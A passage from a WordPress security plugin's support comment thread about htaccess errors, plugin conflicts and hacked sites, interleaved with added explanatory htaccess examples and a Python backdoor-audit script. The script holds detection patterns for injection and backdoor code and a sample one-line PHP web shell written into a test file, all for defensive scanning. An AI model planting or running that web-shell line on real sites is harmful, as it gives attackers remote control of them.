      There are no significant htaccess coding differences in the htaccess coding from .46.2 to .46.3 besides the Options -Indexes directive being brought back so try the upgrade again and use the AutoMagic buttons to create your master htaccess files, then activate all of the BulletProof Modes. Most likely what happened is that the copy and paste contained some whitespace in the paste where it should not have been. I have done this myself so I know it is one reason that you will get a 500 error. This was one of the reasons I added the new W3TC and WPSC HUD checking thing. BPS will now tell you that you need to redeploy W3TC and provide a link in the Heads Up Display HUD message so just activate all BulletProof Modes and then click the W3TC Redeploy link in the HUD message that pops up after you have activated all BulletProof Modes. In other words, you no longer have to manually copy and paste the W3TC htaccess code to your root htaccess file anymore. 😉 A similar HUD message also pops up for those people who are using WP Super Cache with a link to the WPSC mod_rewrite settings page. Thanks.

      Also just as an FYI to anyone who sees a 500 error when they are in Maintenance Mode – when you are in Maintenance Mode you DO NOT want to be adding any new htaccess code to your root htaccess file. If you redeploy W3TC while you are in Maintenance Mode then you will see a 500 error. It is fine to update W3TC but you do not want to do anything that will write any htaccess code to the .htaccess file in your root folder while you are in Maintenance Mode.

  28. Ed says:

    I installed WP 3.1.3 in a subdirectory and followed the instructions in the article Giving WordPress Its Own Directory While Leaving Your Blog In the Root Directory.
    Per those instructions, .htaccess and index.php were moved from the subdirectory to the root. Will BP work with such a setup?

    When I installed and activated BP, in the Status tab, I saw 2 errors:

    Warning: file_get_contents(/home/umodels/public_html/model/.htaccess) [function.file-get-contents]: failed to open stream: No such file or directory in /home/umodels/public_html/model/wp-content/plugins/bulletproof-security/includes/functions.php on line 144

    Warning: file_get_contents(/home/umodels/public_html/model/wp-admin/.htaccess) [function.file-get-contents]: failed to open stream: No such file or directory in /home/umodels/public_html/model/wp-content/plugins/bulletproof-security/includes/functions.php on line 170

    • AITpro Admin says:

      Yes you can make this work, but I do not recommend doing this. You will run into all kinds of problems, not only with BPS, but with many other things. I recommend migrating your site instead. This is a very simple thing to do that should only take you about 10 minutes. Use your host control panel and copy your entire WordPress site (all files) to the new folder location. This is the fastest way to do the move. Then follow the WordPress Codex Migration / Moving instructions here >>> Moving_WordPress

      The php errors you are seeing are PHP5 errors so that is a good thing. What these errors are telling you is that you currently do not have htaccess files in either your root or wp-admin folders. You need to have a custom permalink structure if you are using BPS and you should have one anyway. When you create a custom permalink structure for the first time this will create an htaccess file in your root folder. The first php error could also be one of the first of many problems you will experience if you do the “giving wordpress its own directory…” method. 😉 Thanks.

      • Ed says:

        I don’t quite understand.

        You recommend that I migrate my site to a new folder location but it is already sitting in its own subdirectory. Both would be 1 level below the root so I don’t see what difference it makes, whether it’s in one subdirectory or another.
        If the purpose is to undo the “leaving your blog in the root” part, I can do that using the same subdirectory by undoing the steps I did previously.

        Also, you said I need a custom permalink structure. I already did that. It is “/%year%/%postname%/”.

        Checking the files on my site:
        – the root has .htaccess and index.php, a result of following the “Giving WordPress Its Own Directory While Leaving Your Blog In the Root Directory” article.
        – the subdirectory has all the other WP files. There is no .htaccess in that subdirectory.
        – the wp-admin directory has no .htaccess file

        The reason I employed the technique described in the WP Codex was for 1) a tidy root by keeping the WP files in a subdirectory and 2) a clean URL that hides the fact that the WP files reside in a subdirectory.

        • AITpro Admin says:

          Ok I reread your question and I think I understand what you are trying to do. I was not suggesting that you migrate WordPress to a new folder. I thought you were trying to do something else. The WordPress documentation tells you to update your permalinks again so that a new htaccess file will be created with the correct RewriteBase and RewriteRule so you will just need to copy and paste whatever that WordPress generated htaccess code is to the BPS Master Root htaccess file – the secure.htaccess file. You will be replacing the section of htaccess code in the BPS Master Root htaccess file – the secure.htaccess file that starts with # Begin WordPress and ends with # End WordPress and then you can activate BulletProof Mode for your Root folder. This will overwrite the WordPress htaccess file with the BPS secure.htaccess file.

          Ok well maybe the php error was being caused by something else then. Usually that php error means the file does not exist where the file_get_contents function was told to look.

          Now after saying all that I can’t think of even one good reason to go through all the extra hassle. If WordPress is already installed in a subfolder then just keep everything where it is and don’t bother moving the index.php and htaccess file to the root. Maybe this has something to do with having a URL that does not show the folder name in the URL path? You can do the same thing with htaccess without having to risk URLs not rewriting correctly, but like I said you really don’t need to do that anyway. Thanks.

  29. Jeff says:

    Hi,
    I was wondering about this code :
    # Allow from line of code and remove the # sign in front of Allow from to uncomment it

    Deny from all
    # Allow from 88.55.66.200

    I want to make sure that if I do put in my IP address in there… and for some reason my IP would change, would I still be able to log into my wp dashboard to go and edit this ip in the plugin, so it changes the htaccess files ?

    Or maybe it’s not gonna work, because I log in the blog with a different ip than the one listed in the htaccess file by your plugin.. ?

    I am not sure I’m expressing my questions correctly for you to understand.. sorry.
    My concern is that if my ip changes and it’s set to only the previous one, am I going to be screwed and can’t access my blog anymore ?

    Thank you

    • AITpro Admin says:

      The Allow from IP address is only used for allowing you to access the files listed in the FilesMatch section of htaccess code from your Browser. It does not affect anything else except for the files listed in the FilesMatch section of htaccess code. You could still access those files via FTP. This is just designed to stop someone from being able to open those files from a Browser window. As a test try and open the WordPress readme.html file from your browser and you will not be able to open it. The WordPress readme.html file is located in the root of your site so go to your home page and then type in /readme.html to try and open the file. Now add your IP address and uncomment the Allow from line of code and you will now be able to open that file from your Browser. Thanks.
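
The FilesMatch block that the reply refers to has the shape below. This is an added example, not the page's own code or the plugin's actual file list (the list here is shortened and constructed for illustration); 88.55.66.200 is the placeholder address from the comment above.

```apache
# Added example: direct browser access to a few sensitive files is denied to
# everyone except the one address on the Allow line. The file list is
# illustrative only and is not the BPS plugin's list.
<FilesMatch "^(wp-config\.php|php\.ini|install\.php|readme\.html|\.htaccess)">
  # "Order deny,allow" evaluates Deny first and lets a matching Allow win for
  # the listed address. With "Order allow,deny" the Deny from all would win
  # and the Allow line would have no effect.
  Order deny,allow
  Deny from all
  # Uncomment and replace with your own current public IP address
  # Allow from 88.55.66.200
</FilesMatch>
```

Nothing outside this block, such as wp-login.php, the dashboard pages or FTP, consults that address, so a changed IP only re-closes browser access to the listed files until the line is updated; it cannot lock you out of the site. On Apache 2.4 without mod_access_compat the three directives are replaced by a single Require ip 88.55.66.200 line, and other clients are denied because no Require directive matches them.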

  30. Dave says:

    I installed your plugin, but due to restrictions by my webhost I can’t use it effectively, so I uninstalled it, but now lots of things on my wordpress don’t work, like adding, removing or editing widgets. How do I properly remove BPS?

    • AITpro Admin says:

      Ok the 2 main things that BPS adds to your website that you will need to remove are: The root .htaccess file and the /wp-admin .htaccess file. Did you already have a root .htaccess file before installing BPS? Did you back that file up? Did you restore that .htaccess file if you had one before uninstalling BPS? Did you enable or create a custom permalink structure? If so, and whether or not you did do this, save your custom permalink structure again to create a new generic WordPress .htaccess file. Now either FTP to your website or use your web host Control Panel and delete the .htaccess file that is in your /wp-admin folder. Thanks.

  31. MarkS says:

    Hey guys. I had a question about the BPS plugin. I have this nasty little hack on my site that is altering the htaccess file in wordpress and redirecting all of my google searches to specific spam sites. Will BPS fix that?

    Thanks!

    • AITpro Admin says:

      Yep BPS has built in self protection for itself so that the BPS htaccess files themselves cannot be opened or altered by anyone other than you. This is assuming of course that the hack was done remotely and not done by someone who has hacked your FTP password. BPS will block the initial hacking method that was used to alter your htaccess file and BPS also self protects itself so that the BPS htaccess files cannot be altered. Thanks.

  32. Colin Wee says:

    I installed BulletProof Security on my blog a few days ago and immediately lost the ability to click to view posts. I have since deactivated the software and uninstalled it, but no luck. Can you help?

  33. StuartP says:

    I have WP with BPS installed in my root folder with PhpGedview genealogy suite installed in a subdirectory. I also have a new version of Webtrees installed which uses a lot of the code from PGV so has a similar issue. There is one function (Pedigree Chart) that causes a “Page Not Found” error with both PGV and Webtrees and I have to use a .htaccess in the home directory of both PGV and Webtrees, containing “RewriteEngine Off” otherwise it will not draw Pedigree Charts.

    The format of the URL causing the error is:

    http://www.my_site.org.uk/webtrees/pedigree.php?ged=Gedcom2.ged&show_full=1&talloffset=1
    Can you suggest any other work-around or maybe incorporate a permanent fix into BPS? I am also in touch with the developers of Webtrees so they could rewrite some of the code if necessary as Webtrees is very much “work in progress” at the moment.

    Cheers,

    Stuart

    • AITpro Admin says:

      Yep the RewriteEngine Off htaccess method is an acceptable method to prevent the htaccess rules from the BPS htaccess files from being applied to other folders, but I believe that you will need URL rewriting for that or those particular folders. So what you should use is the default.htaccess file that comes with BPS and copy it to the folder or folders and rename it to just .htaccess. If there is still another or additional issue then I believe the section of the string in the URL that you would want to create a skip rule from would be >>> show_full=1&talloffset= So you could try adding this to your root htaccess file, but I think the real problem is that you do not have URL rewriting occurring for the /webtrees folder anymore since you have an .htaccess file with RewriteEngine Off for that folder.

      # PhpGedview genealogy suite – Possible string skip Fix
      RewriteCond %{QUERY_STRING} show_full=1&talloffset=(.*) [NC]
      RewriteRule . - [S=30]
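
The skip rule above works through mod_rewrite's [S=N] flag, which skips only the N RewriteRule lines that follow it. Two things follow from that: the skip has to sit above the query string filters it is meant to bypass, and N has to be at least the number of RewriteRule lines in the filter block below it. The fragment below is an added example, not code from the page or from the BPS plugin; the two filter patterns are constructed for illustration and are not the plugin's own Query String Exploits filter list.

```apache
# Added example (not BPS code): a skip rule placed ABOVE the filters it bypasses.
RewriteEngine On

# 1. Skip rule: a request whose query string carries the genealogy suite's
#    parameters jumps over the next 2 RewriteRule lines, i.e. both filters.
#    Raise S=N whenever more RewriteRule lines are added below it.
RewriteCond %{QUERY_STRING} show_full=1&talloffset=(.*) [NC]
RewriteRule . - [S=2]

# 2. Illustrative query string filters (constructed, not the plugin's list).
#    %{QUERY_STRING} is matched RAW, before percent-decoding, so each pattern
#    also lists the percent-encoded form of the characters it looks for.
RewriteCond %{QUERY_STRING} (<|%3C)(\s|%20)*script [NC]
RewriteRule ^(.*)$ - [F,L]

RewriteCond %{QUERY_STRING} union(\s|%20|\+)+select [NC]
RewriteRule ^(.*)$ - [F,L]
```

Placed below the filters instead, the skip rule changes nothing for them: a request matching both the skip condition and a filter is still answered with 403. Placed above them, that same request passes, which is also the caveat to keep in mind when adding skip rules: the skip exempts every request that contains the substring, not only the application's legitimate URLs, so keep its condition as specific as the application's query string allows and prefer the per-folder .htaccess approach from the reply where it solves the problem.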

      • StuartP says:

        Hi there,

        Thanks for your comments and suggestions. Adding the default.htaccess to the relevant directories fixes the issues as far as I can tell. Adding your work-around to the root htaccess made no difference to the problem and I still had a “page not found” error.

        Putting in the default htaccess is no problem so as it works I’ll go with that solution.

        Thanks for your help,

        Stuart

  34. Cameron says:

    I installed this plugin last week and ever since I have experienced page loading times that are VERY long. Pages used to load in seconds now it literally takes minutes. It was really bad at first, then got better, but now is bad again. I also run WP Super Cache, thought maybe that was the problem, but I disabled it and it did not help… Is this a known issue? All seems installed correctly, status is all green and says its working.

    Maybe I just shouldn’t use it… Problem is I don’t know how to restore the htaccess files to what they were before installing, so disabling won’t do a thing for me, right?

    • AITpro Admin says:

      Yep there is a known problem with the latest version of Super Cache when using the mod_rewrite option to serve cache files and BPS. Re-enable Super Cache and then you will need to go to the BPS built-in file editor and manually cut the htaccess code that Super Cache is adding to the bottom of the root htaccess file (instead of to the top of the root htaccess file) and paste it at the top of the root htaccess file. There is a coding bug in Super Cache that is doing this and the Super Cache plugin author has been notified. I will be adding an alerting message in the next release of BPS. Please see this WP forum post >>> WP Super Cache WordPress Forum Post Thank you.

      I checked your site and noticed some problems. Your custom permalink structure has /index.php/postname. At least I think that it is postname, but that may be a category tag? Typically you would only include /index.php if you had IIS web hosting. Your site appears to be using Apache Linux hosting so you would not want to be using /index.php in your permalink structure.

      Please see this post I created about the best custom permalinks to use for performance reasons >>> http://www.ait-pro.com/aitpro-blog/2304/wordpress-tips-tricks-fixes/permalinks-wordpress-custom-permalinks-wordpress-best-wordpress-permalinks-structure/

      Ok so your current root htaccess file looks fine right now, but that custom permalink issue needs to be fixed and then once you re-enable Super Cache you are going to see that the WordPress section of code will be moved to the bottom of your htaccess file with additional htaccess code that Super Cache will write to this file once you re-enable it ONLY if you are using the mod_rewrite to serve cache files option.

      If you are not using the “mod_rewrite to serve cache files. (Recommended)” option with Super Cache then no htaccess code will be written to your current root htaccess file. This is much faster so I recommend it, but then you will have to make the manual root htaccess file modifications.

  35. Cesar says:

    Hi guys,

    I’ve just installed BulletProof Security and have one little problem. Whenever I try to make a backup I get a warning saying that it wasn’t able to copy the file to “/home/username/public_html//wp-content/bps-backup/root.htaccess”. Folders are created and CHMODed correctly but it insists on inserting the double slash after public_html. Should I fix this by hand?

    Thanks in advance!

    • AITpro Admin says:

      The double forward slash is ok and will be interpreted as a single slash. Most likely the problem is that safe_mode is on. If safe_mode is enabled by default on your web host you can turn it off in your php.ini file by adding safe_mode = Off. safe_mode is a feature that never really worked and is being completely phased out. It is a feature that only causes problems for legitimate referrers and is very easily bypassed by a hacker so it never really worked as intended anyway.

      If your web host does not allow you to turn off safe_mode then you may not be able to use the automated backup and will have to do manual backups. Double check your folder permissions for your /wp-content folder. /wp-content should have 755 permissions. Thanks.

  36. ggbps says:

    Has Bulletproof Security been tested with autoblogging software such as WP Robot3 or Autoblog Samurai? I am using WPRobot3 and it stopped working once I started using Bulletproof Security. Can you please test with WPRobot3 and let me know?

    Thank you.

  37. Veliremus says:

    Dear AITpro,

    I have installed the plugin, but as soon as I activate Website Root Folder .htaccess Security Mode, some of my images no longer get picked up by my Simple Lightbox plugin. As soon as I restore my .htaccess, it works again (it has been restored now). I think it is mostly the older images that have this problem; newer ones get picked up fine. The BPS plugin looks like something I’d really want to use, but I really need that Lightbox plugin to work. Is there anything I can do?

    Kind regards,

    Veliremus

    • AITpro Admin says:

      Are you talking about the SimpleViewer Flash gallery on your site that loads from the Images link? I do not see that you have a lightbox plugin in use. I see several gallery plugins, but no lightbox. Please add a comment with the specific problem details and a link to the plugin on the Plugin Compatibility and Testing page and I will test it. Thanks.

      • Veliremus says:

        Hey, thanks for your quick reply! No, I’m talking about the Simple Lightbox plugin. But guess what? I managed to fix it myself. In the plugin settings, there is an option called “Validate Links”. It was turned on, but the tooltip said that the default is Off, so I turned it off, and turned on BPS. All images now work properly, on the entire site.

        I hope this is not a temporary thing, but I have tried in multiple browsers and it does seem to have been fixed. I’ll check back if things change, but I’m good for now!

  38. Shah says:

    Hello, I already installed this plugin, but Google keeps sending me messages with a notice of suspected hacking on [link removed by Ed]

    And as you can see, when you search my domain in Google, my site was labelled “This Site May Be Compromised”. Is there any problem with this plugin or problem in my setting?

    • AITpro Admin says:

      Well, first off, the load time of your site is terrible. The Facebook social plugin popup takes minutes to complete and drained all of my system resources, freezing my browser until loading was finished. I’m not sure if this is due to a misconfiguration of the plugin or if this plugin is supposed to work this way. I noticed that it appeared that individual Facebook requests were being processed in my status bar. This is very bad. The plugin should load, but I don’t see why you would have to wait until individual Facebook connections had completed, and actually this should not be happening at all. These appear to be redirects like a hacker would do to your site. Google most likely is sending you the message because it sees your site as possibly being hacked due to the social plugin popup you are using. In general what Google is telling you is that your site has a problem. I can confirm that as well because I visited your site. When I come across sites that cause the problems I just mentioned above, I block the sites permanently in my browser so that I never accidentally click on those website links again. This is definitely something that you don’t want. If visitors never return to your site because of load problems then you will lose a lot of visitor traffic. BPS is primarily designed for security, but you can add htaccess coding to speed up performance for your website. In this case though there is nothing BPS can do to correct the problem that is currently happening on your site. It is a performance issue, not a security issue. Also, in general, when I come across websites that have forced popups I never visit them again. Thanks.

      • Shah says:

        Are you sure about that modal dialog plugin (Facebook popup)? There isn’t any hacking activity on my site? Thankfully 🙂

        • AITpro Admin says:

          Your other comment was flagged as Spam because there were too many links in it, but I am able to view the message that Google sent you. This is an all-purpose general message. The only unusual thing that I saw in the link that Google is giving as an example is that it appears you have some sort of additional courtesy search feature set up. To Google this might look like a suspicious thing because the request is being reprocessed again, which kind of resembles a certain type of hacking method. You may want to take a look at the courtesy search coding or configuration and see if you really need it. Typically a simple 404 is all you need. There really isn’t any need to attempt to research something that is going to generate a 404 twice. I have run some tests on your site and manually looked at your coding and I do not see any suspicious coding on your site.

          Also, your Facebook plugin may be fine, but Google may be seeing in your case that the 3rd party links to Facebook are also an issue. Normally Google will not be triggered to flag a site as potentially hacked, problematic or a spam site if a few redirects exist, especially to a legitimate website like Facebook. It is the extremely large number of HTTP requests acting as redirects that is occurring that could be causing Google to flag your site as having a problem. What you need to keep in mind is that Google has 100’s of these types of general automated emails that they will send out. They cannot and will not specifically look at your particular individual website. This message is triggered automatically because you have things going on on your site that Google does not like.

          Also, in the automated message that Google is sending you they are warning you about spam in regards to the additional courtesy search feature that you have set up, so basically Google is just telling you they don’t like something that is happening on your site that they consider to be a form of spam or spamming. It is triggering automatic flags.

          • Shah says:

            OMG, manually check? Thanks!

            Now I will request considerations from Google 🙂

            For your information, the Modal Dialog plugin only works the first time a visitor visits my site, and will not show up the second time, until they clean up their cookies and history. I also use WP Total Cache to improve my site performance. I have also tested my site performance with many online tools, and my homepage loading result is 1.8 seconds; before I used WP Total Cache, my site performance was 3.5 seconds and above. The other factor is the location of my hosting server, which is in Malaysia. That may have caused the slow page load for you.

            Anyway, thanks for the quick support, I really appreciate that. Cheers.

          • AITpro Admin says:

            Ah. I just pinged your site and yep, I am getting 4 times the normal response time, so there must be a relay lag somewhere. 😉 Still, you might want to rethink having a forced popup displayed to visitors. Like I said, I never go back to sites that force a popup….ever. 😉

            Pinging ohsyok.com [110.4.45.105] with 32 bytes of data:

            Reply from 110.4.45.105: bytes=32 time=230ms TTL=45
            Reply from 110.4.45.105: bytes=32 time=258ms TTL=45
            Reply from 110.4.45.105: bytes=32 time=229ms TTL=45
            Reply from 110.4.45.105: bytes=32 time=318ms TTL=45
            Reply from 110.4.45.105: bytes=32 time=229ms TTL=45
            Reply from 110.4.45.105: bytes=32 time=230ms TTL=45
            Reply from 110.4.45.105: bytes=32 time=229ms TTL=45
            Thanks.

  39. Roy says:

    Even though I have BPS installed, someone was able to inject code into my wp-config file and hijack my Google results. Please advise. I cleaned the wp-config already, but what can I do to protect myself? It’s the second time I got hit: the first time was without BPS, the second one with BPS 🙁

    What chmod is recommended for wp-config?

    Please help me!

    thanks,
    roy

    • AITpro Admin says:

      It is possible then that the first hack of your website placed a backdoor on your site, which means the hackers are already past or inside of BPS security protection. BPS can only protect you from being hacked. If a backdoor is already in place on your site then BPS cannot protect your site. Are you sure you activated BulletProof modes? Also I would like to take a look at your site so either send me your URL in private (use the contact form) or post it here. You would not need to do anything with chmod because the BPS FilesMatch filter does not allow anyone to edit the wp-config.php file – even you – unless you have added your IP address to the root htaccess file first or if you are editing the file via FTP, WP or your CP. So in order for someone to inject code they would have to hijack the root htaccess file itself, which is also protected against any editing – even by you – unless you add your IP address to the file first or if you are editing the file via FTP, WP or your CP. It is very unlikely that a successful injection occurred if BulletProof Modes were activated, so more likely a manual edit was done by someone who has your FTP, WP or CP Web Host password. Since your site was already successfully hacked once you should install Exploit Scanner and make sure that your site is really “clean” of malicious code and then change all of your account passwords. Also the SQL Injection filters block every possible SQL command that can cause damage or irritation from being executed on your site directly. If your Web Host’s SQL Server was hacked itself then BPS can only offer limited protection to stop any serious damages from occurring to your site, but minor irritating injections could penetrate all the way to your site’s particular DB. Thanks.

  40. simon says:

    Hey, first of all i really love this plugin.

    Only I have this problem with the wp-js-external-link-info plugin. It stops working when I have BPS activated.

    The wp-js-external-link-info plugin basically sends all external links to a special info page (on my domain) with information about leaving the blog. The plugin sends to the info page like this:

    mydomain.com/redirect?url=www.externaldomain.com

    But now it gives me 404 or forbidden when I click any external link. Is there any way I can add a rule or something in the .htaccess so the external info page will still be reachable? When I turn off BPS and restore the default .htaccess the wp-js-external-link-info plugin works again….

    Please please please help me…

    THANKS!!

    • AITpro Admin says:

      Hi, this plugin is very poorly documented. I’m not sure what you are supposed to enter on the options page to configure it. The redirection method being used is an outdated HTML redirection method – meta http-equiv=”refresh” – and this is not the best way to redirect a page or site. The best method is to use a 301 redirect in an htaccess file. So you could use BPS to handle your redirects. Please take a look at this page for information on redirection; it also contains info on adding 301 redirection to htaccess files. The plugin author should change his old outdated HTML redirection method to the PHP redirection method.
      Redirection Methods for all platforms
      You may want to experiment with creating skip rules or allowing a string to bypass the BPS security filters. Since I don’t feel that this plugin meets acceptable safety standards and approved redirection methods I am not going to troubleshoot it any further. Thanks.

      • simon says:

        thanks for the awesome fast reply! i will try that. thanks!

        • AITpro Admin says:

          Cool. I noticed that on the link I added to my last comment they are telling you to add Options +FollowSymLinks in an htaccess file. You most likely do not need to add this for your particular web host, and it will cause 500 errors that will make your site not load, so DO NOT use Options +FollowSymLinks. If for some reason your redirects are not working you can try adding it, but 99% of all hosts already have this htaccess directive set by default. The other reason you should not use that old HTML redirection method contained in that plugin is that Google officially discourages that type of redirection method, and your site could actually get penalized by Google and the other search engines for using it. Thanks.

          All you need to add to the root htaccess file would be this to redirect an old page to a new page.
          redirect 301 /old/old.htm http://www.your-domain-name.com/new.htm

          And to redirect an old domain to a new domain.
          RewriteEngine on
          # Match both the bare and the www host name (dots escaped, space before the [OR] flag)
          RewriteCond %{HTTP_HOST} ^www\.old-domain-name\.com$ [OR]
          RewriteCond %{HTTP_HOST} ^old-domain-name\.com$
          RewriteRule ^(.*)$ http://www.your-new-domain-name.com/$1 [R=301,L]

          • simon says:

            Hi, yes it contains a redirect but I’m not using it at all; it’s more that I use the plugin to send external links to a “page with the external link in an iframe” and then I pull the external URL on that warning page with a simple GET command like this:

            [link removed by Ed]
            This is how my page looks (the one I am sending external links to):
            It used to work perfectly but it gives me a 404 error when I have BPS enabled.

            please advice what i can do to make this page reachable again.

            thanks!

          • AITpro Admin says:

            Hmm, well BPS is probably blocking the iframe then too. The combination of the outdated HTML refresh method (that is officially discouraged by Google) that is being used and the method you are using for the iframe simulates hackers’ methods very closely, so if you don’t get a penalty from Google I will be very surprised. I am not going to troubleshoot this plugin because it is doing something that Google does not approve of. Be careful with using iframe coding. Hackers love iframe coding because it is so easy for them to hack. So be sure to create the additional security coding that you should be using if you want to use iframe coding. I would like to help you, but do not want to give you a solution that will open up your website to hackers. 😉 That defeats the purpose of website security. I’ll give you a hint though. There is an iframe filter in BPS that you can comment out. Let me know how long it takes before your website is hacked. LOL What needs to happen first is that the approved methods of redirection need to be used, and used correctly. Then you can write the additional security code to secure your iframes from hackers. If you just add some iframe coding to your website without security coding to protect it then it is only a matter of time until your site gets hacked.

  41. Elizabeth says:

    Hello! I have been suffering from the Pharma Hack for almost a month now. I get rid of it, put in security measures, and it comes back. I finally had to reinstall my entire blog. I installed wp-firewall, wp-malware, captchas, everything and just this week it has come back!

    I found your plugin and installed it, then went through and deleted the evil codes within my directory. They are these random scripts that the Hack puts in throughout random folders in my directory. I deleted all of them…I think. The only problem I ran into was that when going through the bulletproof folders I found two of these codes. One I deleted with no problem. The second gave an error message back on the bps page within my blog. The file I deleted was in the language folder and it was titled wp-cache.class.php. The reason I deleted it is because it had the same mark as the other evil files I deleted. I’m no longer getting any warning message and I wanted to make sure everything was ok. Was this really an evil file? If not, how do I get it back? Thanks for your time and help, and I pray bps works for me! If not…I don’t know what I will do.

    • AITpro Admin says:

      The first thing to eliminate is that you are not using a pre-hacked Theme. Meaning the Pharma Hack is already included in the Theme. Take a look at this post >>> WordPress Pre-hacked Themes
      Then you want to make sure that you have really removed all of the hackers’ code from your site. If you are not already using Exploit Scanner then I recommend installing it to scan your site for any hackers’ code. If you found the hackers’ code or files in the BulletProof Security folders then they are already in your site. BulletProof will protect your site from all hackers trying to hack your website externally, but not if they have already hacked your website and are working internally; or if you are using a pre-hacked Theme then BPS cannot protect you because they are already inside your site. BPS Pro does have disaster recovery utilities, but the Pro version will not be available until June. The file name wp-cache.class.php is not a valid BPS file name, so if you found this in the BPS folders then it was injected there by the hackers’ script. This also means that the hackers are already inside your website and control your website internally. Most hacking scripts are automated – once the script is inside your website it will run automatically at regular intervals to inject its payload. Or even worse – insert a backdoor where the hackers can access your site any time they want. You may want to consider performing a full backup of your site and then restore your website back to a time when you know your website was not hacked. You would also need to change all of your account usernames and passwords. Without a URL to your website included in your comment I cannot eliminate your Theme as a pre-hacked Theme. Thanks.
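
The check the reply describes, finding a file such as wp-cache.class.php that does not belong in a plugin folder, can be automated: compare the tree against the file list of a clean copy and grep every PHP file for constructs that injected backdoors rely on. The script below is an added example, not BPS code and not Exploit Scanner; the manifest names and the sample plugin tree are constructed for the demonstration (they are not the real BulletProof Security file list), so for a real audit you would build KNOWN_FILES from a freshly downloaded copy of the plugin.

```python
"""Audit a WordPress plugin directory for files that do not belong and for
PHP constructs commonly used by injected backdoors (added example)."""
import os
import re
import tempfile

# Assumed manifest of a clean plugin copy (illustrative names only).
KNOWN_FILES = {
    "bulletproof-security.php",
    "admin/options.php",
    "admin/htaccess/default.htaccess",
    "languages/bulletproof-security.pot",
}

# Constructs that are rarely legitimate in plugin code and very common in
# injected PHP: eval of a decoded payload, the /e regex modifier, a request
# parameter used as a function name, and remote file includes.
SUSPICIOUS = [
    (re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)", re.I),
     "eval of decoded payload"),
    (re.compile(r"\bpreg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I),
     "preg_replace /e modifier"),
    (re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I),
     "request parameter used as function name"),
    (re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://", re.I),
     "remote file include"),
]


def scan_file(path):
    """Return the labels of every suspicious construct found in one PHP file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return [label for pattern, label in SUSPICIOUS if pattern.search(src)]


def audit_plugin_dir(root, known_files=KNOWN_FILES):
    """Walk the plugin tree. Report files absent from the manifest, and scan
    every .php file (known or not, since a payload can also be appended to a
    legitimate file) for suspicious constructs."""
    unknown, suspicious = [], []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if rel not in known_files:
                unknown.append(rel)
            if rel.endswith(".php"):
                for label in scan_file(full):
                    suspicious.append((rel, label))
    return {"unknown_files": sorted(unknown), "suspicious": sorted(suspicious)}


def build_sample_tree():
    """Constructed sample: a clean plugin plus one injected file."""
    root = tempfile.mkdtemp(prefix="bps-audit-")
    files = {
        "bulletproof-security.php": "<?php\n// plugin bootstrap\n",
        "admin/options.php": "<?php\necho 'options';\n",
        "admin/htaccess/default.htaccess": "Options -Indexes\n",
        "languages/bulletproof-security.pot": "msgid \"\"\n",
        # Injected: the file name reported in the thread, with a typical payload.
        "languages/wp-cache.class.php": "<?php\neval(base64_decode($_POST['p']));\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    report = audit_plugin_dir(build_sample_tree())
    for rel in report["unknown_files"]:
        print("unknown file:", rel)
    for rel, label in report["suspicious"]:
        print("suspicious:", rel, "->", label)
```

The manifest comparison is the stronger of the two checks: pattern matching catches common payloads but is easy to obfuscate around, whereas a file that a clean copy of the plugin does not ship is unexplained regardless of its contents. Run the same audit over every plugin and theme directory, not just the one where a file was first noticed.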

      • Elizabeth says:

        Thanks for the reply. You are correct, I was infected before installing BPS. As far as I can tell, my theme is ok. You can check it here if you would like [link removed by Ed]. I got it from the wp main site and tweaked it.

        I don’t know a lot about code or hacking, so I am over my head here. I don’t know how to check backdoors. I used the scanner you suggested and it gave me information, but I don’t know how to tell what is malicious or not. I’m completely lost and am starting to think that paying someone to fix this would save me a lot of headache. However, I would prefer not to do that if possible.

        Will the BPS Pro be able to locate and fix the internal problem? I’m almost positive that is what’s going on here and I don’t know what to do. Again, thanks for your valuable help!

        • AITpro Admin says:

          *** UPDATED ***
          Actually I just took a closer look and all those Viagra links are pointing internally, not externally. This looks more like a prank attack by someone who has access to your WordPress site. Try changing all of your account passwords and DO NOT store them on your computer. Then correct the menu links and other links and see what happens. To me this looks more like an inside job done by a prankster.

          That particular Theme (Wasteland) you are using is 3 years old, so you could go to the Cloisters site and get a more recent version of that theme. I see they have a version from 2010. I downloaded the Theme from the repository and it does not have any malicious code in it, but it is a very stripped down Theme. I did not go through the entire coding. I just ran a scan on it, but I did look at sections of the code in the Theme and it is very, very basic. My personal opinion – not a safe Theme to use. You know you can make any Theme visually look the way you want it to look. The visual part of a Theme is just a skin, so it is better to pick a Theme that is popular, comes with a lot of bennies, updated recently, updated frequently with extensive Theme coding, and then just change the visual appearance of that Theme. I hate to tell you this, but your site is completely owned by the hackers. I see Viagra links all over your site. Where they are appearing tells me that your site is completely under the hackers’ control. My honest opinion – back up all your posts and anything else you want to save. Create new usernames and passwords for all your accounts – web host, FTP and anything else. Wipe this site out entirely. Install a new installation of WordPress again and load a brand new Theme. Import your backed up database to the new database after carefully going through your DB tables and data to ensure that everything is legit. Or if you don’t want the challenge of going through your old DB you can just manually copy all of your posts and manually paste them back in. If you want to have someone salvage this site for you it will take quite a lot of work. I am currently overbooked, otherwise I would offer my services to you. A fair price would be somewhere around $400 because it will take around 10 hours to salvage it.
          Maybe you can do this – back up your entire site and DB and then contact your web host and ask them to restore your site to a time when you know it was ok. BPS Pro is a long way off from being finished. Everything that I am automating in BPS is what I would do manually as a human to recover a hacked site. I wish you the best of luck and I am very sorry. Having your website hacked is a terrible experience.
          Sincerely,
          Ed

          • Elizabeth says:

            Thanks so much for your help Ed. I’ve completely deleted and reinstalled my blog, changed all my user names and passwords. For about a month it was fine, now it is back again. I’m not sure how someone has access to my site. No one uses my computer but me. It still happens even though I constantly change my passwords. Every so often new “users” will appear. Sometimes they have a user name similar to mine, other times they have “google” in them. I had set my security settings to not allow users to register, but somehow they are still doing it.

